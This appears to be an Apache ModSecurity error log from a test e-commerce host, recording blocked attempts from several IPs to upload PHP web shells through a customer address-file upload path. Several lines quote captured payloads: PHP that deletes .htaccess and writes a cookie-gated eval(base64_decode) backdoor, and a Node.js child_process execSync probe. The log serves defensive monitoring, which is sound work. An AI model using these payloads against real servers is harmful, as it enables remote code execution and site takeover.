[Sat Feb 28 23:12:15.609777 2026] [:error] [pid 2383930] [client 213.109.225.211:10711] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/y/7y88364f428d25.php8"] [unique_id "aaNoP8iqy3jYVmgj06zilwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Mar 01 11:30:23.700044 2026] [:error] [pid 2400022] [client 101.99.88.90:37342] [client 101.99.88.90] ModSecurity: Warning. Matched phrase ".htaccess" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "601"] [id "932180"] [msg "Restricted File Upload Attempt"] [data "Matched Data: .htaccess found within FILES:file: .htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aaQVP403pg4df9PPalFm6gAAAAE"]
[Sun Mar 01 11:30:23.700262 2026] [:error] [pid 2400022] [client 101.99.88.90:37342] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aaQVP403pg4df9PPalFm6gAAAAE"]
[Sun Mar 01 11:30:23.700463 2026] [:error] [pid 2400022] [client 101.99.88.90:37342] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aaQVP403pg4df9PPalFm6gAAAAE"]
[Sun Mar 01 11:30:23.869825 2026] [:error] [pid 2400022] [client 101.99.88.90:37342] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: mah.php found within FILES:file: mah.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aaQVP403pg4df9PPalFm6wAAAAE"]
[Sun Mar 01 11:30:23.870030 2026] [:error] [pid 2400022] [client 101.99.88.90:37342] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aaQVP403pg4df9PPalFm6wAAAAE"]
[Sun Mar 01 11:30:23.870207 2026] [:error] [pid 2400022] [client 101.99.88.90:37342] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aaQVP403pg4df9PPalFm6wAAAAE"]
[Sun Mar 01 11:30:34.572845 2026] [:error] [pid 2400038] [client 101.99.88.90:46396] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: mah.php found within FILES:file: mah.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aaQVSv6okG7BJFjW-txBRQAAAAU"]
[Sun Mar 01 11:30:34.573027 2026] [:error] [pid 2400038] [client 101.99.88.90:46396] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aaQVSv6okG7BJFjW-txBRQAAAAU"]
[Sun Mar 01 11:30:34.573197 2026] [:error] [pid 2400038] [client 101.99.88.90:46396] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aaQVSv6okG7BJFjW-txBRQAAAAU"]
[Sun Mar 01 17:47:28.995724 2026] [:error] [pid 2408732] [client 89.239.157.171:41376] [client 89.239.157.171] ModSecurity: Rule 7f81f2064be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/7/k788364f428d25.phar"] [unique_id "aaRtoPgv7eN8rAXba7HHBwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Mar 01 17:47:28.996221 2026] [:error] [pid 2408732] [client 89.239.157.171:41376] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/7/k788364f428d25.phar"] [unique_id "aaRtoPgv7eN8rAXba7HHBwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Mar 01 17:47:28.998705 2026] [:error] [pid 2408732] [client 89.239.157.171:41376] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/7/k788364f428d25.phar"] [unique_id "aaRtoPgv7eN8rAXba7HHBwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Mar 01 17:47:28.998941 2026] [:error] [pid 2408732] [client 89.239.157.171:41376] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/7/k788364f428d25.phar"] [unique_id "aaRtoPgv7eN8rAXba7HHBwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Mar 01 17:47:29.309816 2026] [:error] [pid 2408732] [client 89.239.157.171:41376] [client 89.239.157.171] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: k788364f428d25.php8 found within FILES:custom_attributes[country_id]: k788364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaRtofgv7eN8rAXba7HHCAAAAAg"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/k/7/k788364f428d25.phar
[Sun Mar 01 17:47:29.310514 2026] [:error] [pid 2408732] [client 89.239.157.171:41376] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaRtofgv7eN8rAXba7HHCAAAAAg"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/k/7/k788364f428d25.phar
[Sun Mar 01 17:47:29.310724 2026] [:error] [pid 2408732] [client 89.239.157.171:41376] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaRtofgv7eN8rAXba7HHCAAAAAg"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/k/7/k788364f428d25.phar
[Sun Mar 01 17:47:29.648204 2026] [:error] [pid 2408732] [client 89.239.157.171:41376] [client 89.239.157.171] ModSecurity: Rule 7f81f2064be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/7/k788364f428d25.php8"] [unique_id "aaRtofgv7eN8rAXba7HHCQAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Mar 01 17:47:29.648652 2026] [:error] [pid 2408732] [client 89.239.157.171:41376] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/7/k788364f428d25.php8"] [unique_id "aaRtofgv7eN8rAXba7HHCQAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Mar 01 17:47:29.651255 2026] [:error] [pid 2408732] [client 89.239.157.171:41376] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/7/k788364f428d25.php8"] [unique_id "aaRtofgv7eN8rAXba7HHCQAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Mar 01 17:47:29.651447 2026] [:error] [pid 2408732] [client 89.239.157.171:41376] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/7/k788364f428d25.php8"] [unique_id "aaRtofgv7eN8rAXba7HHCQAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 02 13:38:48.686573 2026] [:error] [pid 2421741] [client 46.149.66.101:47724] [client 46.149.66.101] ModSecurity: Rule 7f5c39ba1be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/z/mz88364f428d25.phar"] [unique_id "aaWE2JMLTwS3nLpIWqoBMQAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 02 13:38:48.687127 2026] [:error] [pid 2421741] [client 46.149.66.101:47724] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/z/mz88364f428d25.phar"] [unique_id "aaWE2JMLTwS3nLpIWqoBMQAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 02 13:38:48.689686 2026] [:error] [pid 2421741] [client 46.149.66.101:47724] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/z/mz88364f428d25.phar"] [unique_id "aaWE2JMLTwS3nLpIWqoBMQAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 02 13:38:48.689888 2026] [:error] [pid 2421741] [client 46.149.66.101:47724] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/z/mz88364f428d25.phar"] [unique_id "aaWE2JMLTwS3nLpIWqoBMQAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 02 13:38:48.983203 2026] [:error] [pid 2421741] [client 46.149.66.101:47724] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: mz88364f428d25.php8 found within FILES:custom_attributes[country_id]: mz88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaWE2JMLTwS3nLpIWqoBMgAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/m/z/mz88364f428d25.phar
[Mon Mar 02 13:38:48.983879 2026] [:error] [pid 2421741] [client 46.149.66.101:47724] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaWE2JMLTwS3nLpIWqoBMgAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/m/z/mz88364f428d25.phar
[Mon Mar 02 13:38:48.984072 2026] [:error] [pid 2421741] [client 46.149.66.101:47724] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaWE2JMLTwS3nLpIWqoBMgAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/m/z/mz88364f428d25.phar
[Mon Mar 02 13:38:49.250064 2026] [:error] [pid 2421741] [client 46.149.66.101:47724] [client 46.149.66.101] ModSecurity: Rule 7f5c39ba1be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/z/mz88364f428d25.php8"] [unique_id "aaWE2ZMLTwS3nLpIWqoBMwAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 02 13:38:49.250593 2026] [:error] [pid 2421741] [client 46.149.66.101:47724] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/z/mz88364f428d25.php8"] [unique_id "aaWE2ZMLTwS3nLpIWqoBMwAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 02 13:38:49.253062 2026] [:error] [pid 2421741] [client 46.149.66.101:47724] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/z/mz88364f428d25.php8"] [unique_id "aaWE2ZMLTwS3nLpIWqoBMwAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Mar 02 13:38:49.253319 2026] [:error] [pid 2421741] [client 46.149.66.101:47724] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/z/mz88364f428d25.php8"] [unique_id "aaWE2ZMLTwS3nLpIWqoBMwAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Mar 03 00:27:53.007850 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aaYc-XKpPFQwL8r802j_dQAAAAI"]
